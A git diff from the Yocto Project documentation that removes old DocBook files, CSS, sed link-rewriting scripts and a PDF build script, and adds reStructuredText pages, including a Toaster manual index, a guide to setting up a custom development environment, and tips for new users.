-div.footing, div.navfooter {
-  border: none;
-  color: #ddd;
-  font-size: 80%;
-  text-align:right;
-
-  width: 100%;
-  padding-top: 10px;
-  position: absolute;
-  bottom: 0px;
-  left: 0px;
-
-  background: url('/gfx/footing_bg.png') transparent;
-}
-*/
-
-
-
-  /****************** /
- /  nasty ie tweaks  /
-/ ******************/
-
-/*
-div.heading, div.navheader {
-  width:expression(document.body.clientWidth + "px");
-}
-
-div.footing, div.navfooter {
-  width:expression(document.body.clientWidth + "px");
-  margin-left:expression("-5em");
-}
-body {
-  padding:expression("4em 5em 0em 5em");
-}
-*/
-
-  /**************************************** /
- / mozilla vendor specific css extensions  /
-/ ****************************************/
-/*
-div.navfooter, div.footing{
-  -moz-opacity: 0.8em;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example,
-.tip,
-.warning,
-.caution,
-.note {
-  -moz-border-radius: 0.5em;
-}
-
-b.keycap,
-.keycap {
-  -moz-border-radius: 0.3em;
-}
-*/
-
-table tr td table tr td {
-  display: none;
-}
-
-
-hr {
-  display: none;
-}
-
-table {
-  border: 0em;
-}
-
- .photo {
-  float: right;
-  margin-left:   1.5em;
-  margin-bottom: 1.5em;
-  margin-top: 0em;
-  max-width:      17em;
-  border:     1px solid gray;
-  padding:    3px;
-  background: white;
-}
- .seperator {
-   padding-top: 2em;
-   clear: both;
-  }
-
-  #validators {
-      margin-top: 5em;
-      text-align: right;
-      color: #777;
-  }
-  @media print {
-      body {
-          font-size: 8pt;
-      }
-      .noprint {
-          display: none;
-      }
-  }
-
-
-.tip,
-.note {
-   background: #f0f0f2;
-   color: #333;
-   padding: 20px;
-   margin: 20px;
-}
-
-.tip h3,
-.note h3 {
-   padding: 0em;
-   margin: 0em;
-   font-size: 2em;
-   font-weight: bold;
-   color: #333;
-}
-
-.tip a,
-.note a {
-   color: #333;
-   text-decoration: underline;
-}
-
-.footnote {
-   font-size: small;
-   color: #333;
-}
-
-/* Changes the announcement text */
-.tip h3,
-.warning h3,
-.caution h3,
-.note h3 {
-   font-size:large;
-   color: #00557D;
-}
diff --git a/documentation/toaster-manual/toaster-manual.rst b/documentation/toaster-manual/toaster-manual.rst
new file mode 100644
index 0000000000..b003f1ceaa
--- /dev/null
+++ b/documentation/toaster-manual/toaster-manual.rst
@@ -0,0 +1,19 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+===================
+Toaster User Manual
+===================
+
+|
+
+.. toctree::
+   :caption: Table of Contents
+   :numbered:
+
+   toaster-manual-intro
+   toaster-manual-start
+   toaster-manual-setup-and-use
+   toaster-manual-reference
+   history
+
+.. include:: /boilerplate.rst
diff --git a/documentation/toaster-manual/toaster-manual.xml b/documentation/toaster-manual/toaster-manual.xml
deleted file mode 100755
index 03db6bed3a..0000000000
--- a/documentation/toaster-manual/toaster-manual.xml
+++ /dev/null
@@ -1,178 +0,0 @@
-<!DOCTYPE book PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<book id='toaster-manual' lang='en'
-      xmlns:xi="http://www.w3.org/2003/XInclude"
-      xmlns="http://docbook.org/ns/docbook"
-      >
-    <bookinfo>
-
-        <mediaobject>
-            <imageobject>
-                <imagedata fileref='figures/toaster-title.png'
-                    format='SVG'
-                    align='left' scalefit='1' width='100%'/>
-            </imageobject>
-        </mediaobject>
-
-        <title>
-            Toaster User Manual
-        </title>
-
-        <authorgroup>
-            <author>
-                <affiliation>
-                    <orgname>&ORGNAME;</orgname>
-                </affiliation>
-                <email>&ORGEMAIL;</email>
-            </author>
-        </authorgroup>
-
-        <revhistory>
-            <revision>
-                <revnumber>1.8</revnumber>
-                <date>April 2015</date>
-                <revremark>The initial document released with the Yocto Project 1.8 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.0</revnumber>
-                <date>October 2015</date>
-                <revremark>Released with the Yocto Project 2.0 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.1</revnumber>
-                <date>April 2016</date>
-                <revremark>Released with the Yocto Project 2.1 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.2</revnumber>
-                <date>October 2016</date>
-                <revremark>Released with the Yocto Project 2.2 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.3</revnumber>
-                <date>May 2017</date>
-                <revremark>Released with the Yocto Project 2.3 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.4</revnumber>
-                <date>October 2017</date>
-                <revremark>Released with the Yocto Project 2.4 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.5</revnumber>
-                <date>May 2018</date>
-                <revremark>Released with the Yocto Project 2.5 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.6</revnumber>
-                <date>November 2018</date>
-                <revremark>Released with the Yocto Project 2.6 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.7</revnumber>
-                <date>May 2019</date>
-                <revremark>Released with the Yocto Project 2.7 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.0</revnumber>
-                <date>October 2019</date>
-                <revremark>Released with the Yocto Project 3.0 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1</revnumber>
-                <date>April 2020</date>
-                <revremark>Released with the Yocto Project 3.1 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1.1</revnumber>
-                <date>June 2020</date>
-                <revremark>Released with the Yocto Project 3.1.1 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1.2</revnumber>
-                <date>August 2020</date>
-                <revremark>Released with the Yocto Project 3.1.2 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1.3</revnumber>
-                <date>October 2020</date>
-                <revremark>Released with the Yocto Project 3.1.3 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1.4</revnumber>
-                <date>&REL_MONTH_YEAR;</date>
-                <revremark>Released with the Yocto Project 3.1.4 Release.</revremark>
-            </revision>
-       </revhistory>
-
-    <copyright>
-      <year>&COPYRIGHT_YEAR;</year>
-      <holder>Linux Foundation</holder>
-    </copyright>
-
-    <legalnotice>
-      <para>
-        Permission is granted to copy, distribute and/or modify this document under
-        the terms of the <ulink type="http" url="http://creativecommons.org/licenses/by-sa/2.0/uk/">Creative Commons Attribution-Share Alike 2.0 UK: England &amp; Wales</ulink> as published by Creative Commons.
-      </para>
-           <note><title>Manual Notes</title>
-               <itemizedlist>
-                   <listitem><para>
-                       This version of the
-                       <emphasis>Toaster User Manual</emphasis>
-                       is for the &YOCTO_DOC_VERSION; release of the
-                       Yocto Project.
-                       To be sure you have the latest version of the manual
-                       for this release, go to the
-                       <ulink url='&YOCTO_DOCS_URL;'>Yocto Project documentation page</ulink>
-                       and select the manual from that site.
-                       Manuals from the site are more up-to-date than manuals
-                       derived from the Yocto Project released TAR files.
-                       </para></listitem>
-                   <listitem><para>
-                       If you located this manual through a web search, the
-                       version of the manual might not be the one you want
-                       (e.g. the search might have returned a manual much
-                       older than the Yocto Project version with which you
-                       are working).
-                       You can see all Yocto Project major releases by
-                       visiting the
-                       <ulink url='&YOCTO_WIKI_URL;/wiki/Releases'>Releases</ulink>
-                       page.
-                       If you need a version of this manual for a different
-                       Yocto Project release, visit the
-                       <ulink url='&YOCTO_DOCS_URL;'>Yocto Project documentation page</ulink>
-                       and select the manual set by using the
-                       "ACTIVE RELEASES DOCUMENTATION" or "DOCUMENTS ARCHIVE"
-                       pull-down menus.
-                       </para></listitem>
-                   <listitem>
-                       <para>
-                       To report any inaccuracies or problems with this
-                       (or any other Yocto Project) manual, send an email to
-                       the Yocto Project documentation mailing list at
-                       <filename>docs@lists.yoctoproject.org</filename> or
-                       log into the freenode <filename>#yocto</filename> channel.
-                       </para>
-                   </listitem>
-               </itemizedlist>
-           </note>
-
-    </legalnotice>
-
-    </bookinfo>
-
-    <xi:include href="toaster-manual-intro.xml"/>
-
-    <xi:include href="toaster-manual-start.xml"/>
-
-    <xi:include href="toaster-manual-setup-and-use.xml"/>
-
-    <xi:include href="toaster-manual-reference.xml"/>
-
-</book>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/tools/eclipse-help.sed b/documentation/tools/eclipse-help.sed
deleted file mode 100644
index ab5c9affd4..0000000000
--- a/documentation/tools/eclipse-help.sed
+++ /dev/null
@@ -1,18 +0,0 @@
-# Process poky-ref-manual and yocto-project-qs manual (<word>-<word>-<word> style)
-# For example:
-#   "ulink" href="http://www.yoctoproject.org/docs/1.3/poky-ref-manual/poky-ref-manual.html#faq"
-#   -> "link" href="../poky-ref-manual/faq.html"
-s@"ulink" href="http://www.yoctoproject.org/docs/[^/]*/([a-z]*-[a-z]*-[a-z]*)/[a-z]*-[a-z]*-[a-z]*.html#([^"]*)"/@"link" href="../1/2.html"@g
-
-# Processes all other manuals (<word>-<word> style)
-# For example:
-#   "ulink" href="http://www.yoctoproject.org/docs/1.3/kernel-manual/kernel-manual.html#faq"
-#   -> "link" href="../kernel-manual/faq.html"
-s@"ulink" href="http://www.yoctoproject.org/docs/[^/]*/([a-z]*-[a-z]*)/[a-z]*-[a-z]*.html#([^"]*)"@"link" href="../1/2.html"@g
-
-# Process cases where just an external manual is referenced without an id anchor
-# For example:
-#   "ulink" href="http://www.yoctoproject.org/docs/1.3/kernel-manual/kernel-manual.html
-#   -> "link" href="../kernel-manual/index.html"
-s@"ulink" href="http://www.yoctoproject.org/docs/[^/]*/([a-z]*-[a-z]*-[a-z]*)/[a-z]*-[a-z]*-[a-z]*.html"@"link" href="../1/index.html"@g
-s@"ulink" href="http://www.yoctoproject.org/docs/[^/]*/([a-z]*-[a-z]*)/[a-z]*-[a-z]*.html"@"link" href="../1/index.html"@g
diff --git a/documentation/tools/mega-manual.sed b/documentation/tools/mega-manual.sed
deleted file mode 100644
index 12e0e6145b..0000000000
--- a/documentation/tools/mega-manual.sed
+++ /dev/null
@@ -1,36 +0,0 @@
-# Processes bitbake-user-manual (<word>-<word>-<word> style).
-# This style is for manual three-word folders, which currently is only the BitBake User Manual.
-# We used to have the "yocto-project-qs" and "poky-ref-manual" folders but no longer do.
-# s@"ulink" href="http://www.yoctoproject.org/docs/3.1.4/[a-z]*-[a-z]*-[a-z]*/[a-z]*-[a-z]*-[a-z]*.html#@"link" href="#@g
-s@"ulink" href="http://www.yoctoproject.org/docs/3.1.4/bitbake-user-manual/bitbake-user-manual.html#@"link" href="#@g
-
-# Processes all other manuals (<word>-<word> style).
-# This style is for manual folders that use two word, which is the standard now (e.g. "ref-manual").
-# Here is the one-liner:
-# s@"ulink" href="http://www.yoctoproject.org/docs/3.1.4/[a-z]*-[a-z]*/[a-z]*-[a-z]*.html#@"link" href="#@g
-
-s@"ulink" href="http://www.yoctoproject.org/docs/3.1.4/sdk-manual/sdk-manual.html#@"link" href="#@g
-s@"ulink" href="http://www.yoctoproject.org/docs/3.1.4/bsp-guide/bsp-guide.html#@"link" href="#@g
-s@"ulink" href="http://www.yoctoproject.org/docs/3.1.4/dev-manual/dev-manual.html#@"link" href="#@g
-s@"ulink" href="http://www.yoctoproject.org/docs/3.1.4/overview-manual/overview-manual.html#@"link" href="#@g
-s@"ulink" href="http://www.yoctoproject.org/docs/3.1.4/brief-yoctoprojectqs/brief-yoctoprojectqs.html#@"link" href="#@g
-s@"ulink" href="http://www.yoctoproject.org/docs/3.1.4/kernel-dev/kernel-dev.html#@"link" href="#@g
-s@"ulink" href="http://www.yoctoproject.org/docs/3.1.4/profile-manual/profile-manual.html#@"link" href="#@g
-s@"ulink" href="http://www.yoctoproject.org/docs/3.1.4/ref-manual/ref-manual.html#@"link" href="#@g
-s@"ulink" href="http://www.yoctoproject.org/docs/3.1.4/toaster-manual/toaster-manual.html#@"link" href="#@g
-
-# Process cases where just an external manual is referenced without an id anchor
-s@<a class="ulink" href="http://www.yoctoproject.org/docs/3.1.4/brief-yoctoprojectqs/brief-yoctoprojectqs.html" target="_top">Yocto Project Quick Build</a>@Yocto Project Quick Build@g
-s@<a class="ulink" href="http://www.yoctoproject.org/docs/3.1.4/bitbake-user-manual/bitbake-user-manual.html" target="_top">BitBake User Manual</a>@BitBake User Manual@g
-s@<a class="ulink" href="http://www.yoctoproject.org/docs/3.1.4/dev-manual/dev-manual.html" target="_top">Yocto Project Development Tasks Manual</a>@Yocto Project Development Tasks Manual@g
-s@<a class="ulink" href="http://www.yoctoproject.org/docs/3.1.4/overview-manual/overview-manual.html" target="_top">Yocto Project Overview and Concepts Manual</a>@Yocto project Overview and Concepts Manual@g
-s@<a class="ulink" href="http://www.yoctoproject.org/docs/3.1.4/sdk-manual/sdk-manual.html" target="_top">Yocto Project Application Development and the Extensible Software Development Kit (eSDK)</a>@Yocto Project Application Development and the Extensible Software Development Kit (eSDK)@g
-s@<a class="ulink" href="http://www.yoctoproject.org/docs/3.1.4/bsp-guide/bsp-guide.html" target="_top">Yocto Project Board Support Package (BSP) Developer's Guide</a>@Yocto Project Board Support Package (BSP) Developer's Guide@g
-s@<a class="ulink" href="http://www.yoctoproject.org/docs/3.1.4/profile-manual/profile-manual.html" target="_top">Yocto Project Profiling and Tracing Manual</a>@Yocto Project Profiling and Tracing Manual@g
-s@<a class="ulink" href="http://www.yoctoproject.org/docs/3.1.4/kernel-dev/kernel-dev.html" target="_top">Yocto Project Linux Kernel Development Manual</a>@Yocto Project Linux Kernel Development Manual@g
-s@<a class="ulink" href="http://www.yoctoproject.org/docs/3.1.4/ref-manual/ref-manual.html" target="_top">Yocto Project Reference Manual</a>@Yocto Project Reference Manual@g
-s@<a class="ulink" href="http://www.yoctoproject.org/docs/3.1.4/toaster-manual/toaster-manual.html" target="_top">Toaster User Manual</a>@Toaster User Manual@g
-
-# Process a single, rouge occurrence of a linked reference to the Mega-Manual.
-s@<a class="ulink" href="http://www.yoctoproject.org/docs/3.1.4/mega-manual/mega-manual.html" target="_top">Yocto Project Mega-Manual</a>@Yocto Project Mega-Manual@g
-
diff --git a/documentation/tools/poky-docbook-to-pdf b/documentation/tools/poky-docbook-to-pdf
deleted file mode 100755
index f55fd278af..0000000000
--- a/documentation/tools/poky-docbook-to-pdf
+++ /dev/null
@@ -1,51 +0,0 @@
-#!/bin/sh
-	
-if [ -z "$1" -o -z "$2" ]; then
-   echo "usage: [-v] $0 <docbook file> <templatedir>"
-   echo
-   echo "*NOTE* you need xsltproc, fop and nwalsh docbook stylesheets" 
-   echo "       installed for this to work!"
-   echo
-   exit 0
-fi
-
-FO=`echo $1 | sed s/.xml/.fo/` || exit 1
-PDF=`echo $1 | sed s/.xml/.pdf/` || exit 1
-TEMPLATEDIR=$2
-
-##
-# These URI should be rewritten by your distribution's xml catalog to
-# match your localy installed XSL stylesheets.
-XSL_BASE_URI="http://docbook.sourceforge.net/release/xsl/current"
-
-# Creates a temporary XSL stylesheet based on titlepage.xsl
-xsltproc -o /tmp/titlepage.xsl                                           \
-	 --xinclude                                                      \
-         $XSL_BASE_URI/template/titlepage.xsl \
-         $TEMPLATEDIR/titlepage.templates.xml || exit 1
-
-# Creates the file needed for FOP
-xsltproc --xinclude                    \
-	 --stringparam hyphenate false \
-	 --stringparam formal.title.placement "figure after" \
-	 --stringparam ulink.show 1 \
-         --stringparam  body.font.master  9 \
-         --stringparam  title.font.master  11 \
-         --stringparam draft.watermark.image "$TEMPLATEDIR/draft.png" \
-         --stringparam  chapter.autolabel 1 \
-         --stringparam  appendix.autolabel A \
-         --stringparam  section.autolabel 1 \
-         --stringparam  section.label.includes.component.label 1 \
-         --output $FO               \
-         $TEMPLATEDIR/poky-db-pdf.xsl    \
-	 $1                 || exit 1
-
-# Invokes the Java version of FOP.  Uses the additional configuration file common/fop-config.xml
-fop -c $TEMPLATEDIR/fop-config.xml -fo $FO -pdf $PDF       || exit 1
-
-rm -f $FO
-rm -f  /tmp/titlepage.xsl
-
-echo
-echo " #### Success! $PDF ready. ####"
-echo
diff --git a/documentation/tools/update-documentation-conf b/documentation/tools/update-documentation-conf
index 3f8d280093..adfca3ca50 100644
--- a/documentation/tools/update-documentation-conf
+++ b/documentation/tools/update-documentation-conf
@@ -1,23 +1,13 @@
 #!/usr/bin/env python
-
+#
+# SPDX-License-Identifier: GPL-2.0-only
+#
 # documentation.conf update script
 #
 # Author: Paul Eggleton <paul.eggleton@linux.intel.com>
 #
 # Copyright (C) 2015 Intel Corporation
 #
-# This program is free software; you can redistribute it and/or modify
-# it under the terms of the GNU General Public License version 2 as
-# published by the Free Software Foundation.
-#
-# This program is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License along
-# with this program; if not, write to the Free Software Foundation, Inc.,
-# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
 
 
 import sys
diff --git a/documentation/transitioning-to-a-custom-environment.rst b/documentation/transitioning-to-a-custom-environment.rst
new file mode 100644
index 0000000000..b87fec6893
--- /dev/null
+++ b/documentation/transitioning-to-a-custom-environment.rst
@@ -0,0 +1,116 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+=============================================================
+Transitioning to a custom environment for systems development
+=============================================================
+
+|
+
+.. note::
+
+   So you've finished the :doc:`brief-yoctoprojectqs/brief-yoctoprojectqs` and
+   glanced over the document :doc:`what-i-wish-id-known`, the latter contains
+   important information learned from other users. You're well prepared. But
+   now, as you are starting your own project, it isn't exactly straightforward what
+   to do. And, the documentation is daunting. We've put together a few hints to
+   get you started.
+
+#. **Make a list of the processor, target board, technologies, and capabilities
+   that will be part of your project**.
+   You will be finding layers with recipes and other metadata that support these
+   things, and adding them to your configuration. (See #3)
+
+#. **Set up your board support**.
+   Even if you're using custom hardware, it might be easier to start with an
+   existing target board that uses the same processor or at least the same
+   architecture as your custom hardware. Knowing the board already has a
+   functioning Board Support Package (BSP) within the project makes it easier
+   for you to get comfortable with project concepts.
+
+#. **Find and acquire the best BSP for your target**.
+   Use the :yocto_home:`Yocto Project curated layer index
+   </software-overview/layers/>` or even the `OpenEmbedded layer index
+   <https://layers.openembedded.org>`_ to find and acquire the best BSP for your
+   target board. The Yocto Project layer index BSPs are regularly validated. The
+   best place to get your first BSP is from your silicon manufacturer or board
+   vendor – they can point you to their most qualified efforts. In general, for
+   Intel silicon use meta-intel, for Texas Instruments use meta-ti, and so
+   forth. Choose a BSP that has been tested with the same Yocto Project release
+   that you've downloaded. Be aware that some BSPs may not be immediately
+   supported on the very latest release, but they will be eventually.
+
+   You might want to start with the build specification that Poky provides
+   (which is reference embedded distribution) and then add your newly chosen
+   layers to that. Here is the information :ref:`about adding layers
+   <dev-manual/dev-manual-common-tasks:Understanding and Creating Layers>`.
+
+#. **Based on the layers you've chosen, make needed changes in your
+   configuration**.
+   For instance, you've chosen a machine type and added in the corresponding BSP
+   layer. You'll then need to change the value of the ``MACHINE`` variable in your
+   configuration file (build/local.conf) to point to that same machine
+   type. There could be other layer-specific settings you need to change as
+   well. Each layer has a ``README`` document that you can look at for this type of
+   usage information.
+
+#. **Add a new layer for any custom recipes and metadata you create**.
+   Use the ``bitbake-layers create-layer`` tool for Yocto Project 2.4+
+   releases. If you are using a Yocto Project release earlier than 2.4, use the
+   ``yocto-layer create`` tool. The ``bitbake-layers`` tool also provides a number
+   of other useful layer-related commands. See
+   :ref:`dev-manual/dev-manual-common-tasks:creating a general layer using the
+   \`\`bitbake-layers\`\` script` section.
+
+#. **Create your own layer for the BSP you're going to use**.
+   It is not common that you would need to create an entire BSP from scratch
+   unless you have a *really* special device. Even if you are using an existing
+   BSP, :ref:`create your own layer for the BSP <bsp-guide/bsp:creating a new
+   bsp layer using the \`\`bitbake-layers\`\` script>`. For example, given a
+   64-bit x86-based machine, copy the conf/intel-corei7-64 definition and give
+   the machine a relevant name (think board name, not product name). Make sure
+   the layer configuration is dependent on the meta-intel layer (or at least,
+   meta-intel remains in your bblayers.conf). Now you can put your custom BSP
+   settings into your layer and you can re-use it for different applications.
+
+#. **Write your own recipe to build additional software support that isn't
+   already available in the form of a recipe**.
+   Creating your own recipe is especially important for custom application
+   software that you want to run on your device. Writing new recipes is a
+   process of refinement. Start by getting each step of the build process
+   working beginning with fetching all the way through packaging. Next, run the
+   software on your target and refine further as needed. See :ref:`Writing a New
+   Recipe <dev-manual/dev-manual-common-tasks:writing a new recipe>` in the
+   Yocto Project Development Tasks Manual for more information.
+
+#. **Now you're ready to create an image recipe**.
+   There are a number of ways to do this. However, it is strongly recommended
+   that you have your own image recipe - don't try appending to existing image
+   recipes. Recipes for images are trivial to create and you usually want to
+   fully customize their contents.
+
+#. **Build your image and refine it**.
+   Add what's missing and fix anything that's broken using your knowledge of the
+   :ref:`workflow <sdk-manual/sdk-extensible:using \`\`devtool\`\` in your sdk
+   workflow>` to identify where issues might be occurring.
+
+#. **Consider creating your own distribution**.
+   When you get to a certain level of customization, consider creating your own
+   distribution rather than using the default reference distribution.
+
+   Distribution settings define the packaging back-end (e.g. rpm or other) as
+   well as the package feed and possibly the update solution. You would create
+   your own distribution in a new layer inheriting from Poky but overriding what
+   needs to change for your distribution. If you find yourself adding a lot of
+   configuration to your local.conf file aside from paths and other typical
+   local settings, it's time to :ref:`consider creating your own distribution
+   <dev-manual/dev-manual-common-tasks:creating your own distribution>`.
+
+   You can add product specifications that can customize the distribution if
+   needed in other layers. You can also add other functionality specific to the
+   product. But to update the distribution, not individual products, you update
+   the distribution feature through that layer.
+
+#. **Congratulations! You're well on your way.**
+   Welcome to the Yocto Project community.
+
+.. include:: /boilerplate.rst
diff --git a/documentation/what-i-wish-id-known.rst b/documentation/what-i-wish-id-known.rst
new file mode 100644
index 0000000000..593c6fe149
--- /dev/null
+++ b/documentation/what-i-wish-id-known.rst
@@ -0,0 +1,226 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+=========================================
+What I wish I'd known about Yocto Project
+=========================================
+
+|
+
+.. note::
+
+   Before reading further, make sure you've taken a look at the
+   :yocto_home:`Software Overview</software-overview>` page which presents the
+   definitions for many of the terms referenced here. Also, know that some of the
+   information here won't make sense now, but as you start developing, it is the
+   information you'll want to keep close at hand. These are best known methods for
+   working with Yocto Project and they are updated regularly.
+
+Using the Yocto Project is fairly easy, *until something goes wrong*. Without an
+understanding of how the build process works, you'll find yourself trying to
+troubleshoot "a black box". Here are a few items that new users wished they had
+known before embarking on their first build with Yocto Project. Feel free to
+contact us with other suggestions.
+
+#. **Use Git, not the tarball download:**
+   If you use git the software will be automatically updated with bug updates
+   because of how git works. If you download the tarball instead, you will need
+   to be responsible for your own updates.
+
+#. **Get to know the layer index:**
+   All layers can be found in the `layer index
+   <https://layers.openembedded.org/>`_. Layers which have applied for Yocto
+   Project Compatible status (structure continuity assurance and testing) can be
+   found in the :yocto_home:`Yocto Project Compatible index
+   </software-over/layer/>`.  Generally check the Compatible layer index first,
+   and if you don't find the necessary layer check the general layer index. The
+   layer index is an original artifact from the Open Embedded Project. As such,
+   that index doesn't have the curating and testing that the Yocto Project
+   provides on Yocto Project Compatible layer list, but the latter has fewer
+   entries. Know that when you start searching in the layer index that not all
+   layers have the same level of maturity, validation, or usability.  Nor do
+   searches prioritize displayed results. There is no easy way to help you
+   through the process of choosing the best layer to suit your needs.
+   Consequently, it is often trial and error, checking the mailing lists, or
+   working with other developers through collaboration rooms that can help you
+   make good choices.
+
+#. **Use existing BSP layers from silicon vendors when possible:**
+   Intel, TI, NXP and others have information on what BSP layers to use with
+   their silicon. These layers have names such as "meta-intel" or "meta-ti". Try
+   not to build layers from scratch. If you do have custom silicon, use one of
+   these layers as a guide or template and familiarize yourself with the
+   :doc:`bsp-guide/bsp-guide`.
+
+#. **Do not put everything into one layer:**
+   Use different layers to logically separate information in your build. As an
+   example, you could have a BSP layer, a GUI layer, a distro configuration,
+   middleware, or an application (e.g. "meta-filesystems", "meta-python",
+   "meta-intel", and so forth).  Putting your entire build into one layer limits
+   and complicates future customization and reuse.  Isolating information into
+   layers, on the other hand, helps keep simplify future customizations and
+   reuse.
+
+#. **Never modify the POKY layer. Never. Ever. When you update to the next
+   release, you'll lose all of your work. ALL OF IT.**
+
+#. **Don't be fooled by documentation searching results:**
+   Yocto Project documentation is always being updated. Unfortunately, when you
+   use Google to search for Yocto Project concepts or terms, Google consistently
+   searches and retrieves older versions of Yocto Project manuals. For example,
+   searching for a particular topic using Google could result in a "hit" on a
+   Yocto Project manual that is several releases old. To be sure that you are
+   using the most current Yocto Project documentation, use the drop-down menu at
+   the top of any of its page.
+
+   Many developers look through the :yocto_docs:`All-in-one 'Mega' Manual </singleindex.html>`
+   for a concept or term by doing a search through the whole page.  This manual
+   is a concatenation of the core set of Yocto Project manual.  Thus, a simple
+   string search using Ctrl-F in this manual produces all the "hits" for a
+   desired term or concept.  Once you find the area in which you are
+   interested, you can display the actual manual, if desired. It is also
+   possible to use the search bar in the menu or in the left navigation pane.
+
+#. **Understand the basic concepts of how the build system works: the workflow:**
+   Understanding the Yocto Project workflow is important as it can help you both
+   pinpoint where trouble is occurring and how the build is breaking. The
+   workflow breaks down into the following steps:
+
+   #. Fetch – get the source code
+   #. Extract – unpack the sources
+   #. Patch – apply patches for bug fixes and new capability
+   #. Configure – set up your environment specifications
+   #. Build – compile and link
+   #. Install – copy files to target directories
+   #. Package – bundle files for installation
+
+   During "fetch", there may be an inability to find code. During "extract",
+   there is likely an invalid zip or something similar. In other words, the
+   function of a particular part of the workflow gives you an idea of what might
+   be going wrong.
+
+   .. image:: figures/yp-how-it-works-new-diagram.png
+
+#. **Know that you can generate a dependency graph and learn how to do it:**
+   A dependency graph shows dependencies between recipes, tasks, and targets.
+   You can use the "-g" option with BitBake to generate this graph.  When you
+   start a build and the build breaks, you could see packages you have no clue
+   about or have any idea why the build system has included them.  The
+   dependency graph can clarify that confusion.  You can learn more about
+   dependency graphs and how to generate them in the
+   :ref:`bitbake-user-manual/bitbake-user-manual-intro:generating dependency
+   graphs` section in the BitBake User Manual.
+
+#. **Here's how you decode "magic" folder names in tmp/work:**
+   The build system fetches, unpacks, preprocesses, and builds. If something
+   goes wrong, the build system reports to you directly the path to a folder
+   where the temporary (build/tmp) files and packages reside resulting from the
+   build.  For a detailed example of this process, see the :yocto_wiki:`example
+   </Cookbook:Example:Adding_packages_to_your_OS_image>`. Unfortunately this
+   example is on an earlier release of Yocto Project.
+
+   When you perform a build, you can use the "-u" BitBake command-line option to
+   specify a user interface viewer into the dependency graph (e.g. knotty,
+   ncurses, or taskexp) that helps you understand the build dependencies better.
+
+#. **You can build more than just images:**
+   You can build and run a specific task for a specific package (including
+   devshell) or even a single recipe. When developers first start using the
+   Yocto Project, the instructions found in the
+   :doc:`brief-yoctoprojectqs/brief-yoctoprojectqs` show how to create an image
+   and then run or flash that image.  However, you can actually build just a
+   single recipe. Thus, if some dependency or recipe isn't working, you can just
+   say "bitbake foo" where "foo" is the name for a specific recipe.  As you
+   become more advanced using the Yocto Project, and if builds are failing, it
+   can be useful to make sure the fetch itself works as desired. Here are some
+   valuable links: :ref:`dev-manual/dev-manual-common-tasks:Using a Development
+   Shell` for information on how to build and run a specific task using
+   devshell. Also, the :ref:`SDK manual shows how to build out a specific recipe
+   <sdk-devtool-use-devtool-modify-to-modify-the-source-of-an-existing-component>`.
+
+#. **An ambiguous definition: Package vs Recipe:**
+   A recipe contains instructions the build system uses to create
+   packages. Recipes and Packages are the difference between the front end and
+   the result of the build process.
+
+   As mentioned, the build system takes the recipe and creates packages from the
+   recipe's instructions. The resulting packages are related to the one thing
+   the recipe is building but are different parts (packages) of the build
+   (i.e. the main package, the doc package, the debug symbols package, the
+   separate utilities package, and so forth). The build system splits out the
+   packages so that you don't need to install the packages you don't want or
+   need, which is advantageous because you are building for small devices when
+   developing for embedded and IoT.
+
+#. **You will want to learn about and know what's packaged in rootfs.**
+
+#. **Create your own image recipe:**
+   There are a number of ways to create your own image recipe.  We suggest you
+   create your own image recipe as opposed to appending an existing recipe.  It
+   is trivial and easy to write an image recipe.  Again, do not try appending to
+   an existing image recipe. Create your own and do it right from the start.
+
+#. **Finally, here is a list of the basic skills you will need as a systems
+   developer. You must be able to:**
+
+   * deal with corporate proxies
+   * add a package to an image
+   * understand the difference between a recipe and package
+   * build a package by itself and why that's useful
+   * find out what packages are created by a recipe
+   * find out what files are in a package
+   * find out what files are in an image
+   * add an ssh server to an image (enable transferring of files to target)
+   * know the anatomy of a recipe
+   * know how to create and use layers
+   * find recipes (with the `OpenEmbedded Layer index <https://layers.openembedded.org>`_)
+   * understand difference between machine and distro settings
+   * find and use the right BSP (machine) for your hardware
+   * find examples of distro features and know where to set them
+   * understanding the task pipeline and executing individual tasks
+   * understand devtool and how it simplifies your workflow
+   * improve build speeds with shared downloads and shared state cache
+   * generate and understand a dependency graph
+   * generate and understand bitbake environment
+   * build an Extensible SDK for applications development
+
+#. **Depending on what you primary interests are with the Yocto Project, you
+   could consider any of the following reading:**
+
+   * **Look Through the Yocto Project Development Tasks Manual**: This manual
+     contains procedural information grouped to help you get set up, work with
+     layers, customize images, write new recipes, work with libraries, and use
+     QEMU. The information is task-based and spans the breadth of the Yocto
+     Project. See the :doc:`../dev-manual/dev-manual`.
+
+   * **Look Through the Yocto Project Application Development and the Extensible
+     Software Development Kit (eSDK) manual**: This manual describes how to use
+     both the standard SDK and the extensible SDK, which are used primarily for
+     application development. The :doc:`../sdk-manual/sdk-extensible` also provides
+     example workflows that use devtool. See the section
+     :ref:`sdk-manual/sdk-extensible:using \`\`devtool\`\` in your sdk workflow`
+     for more information.
+
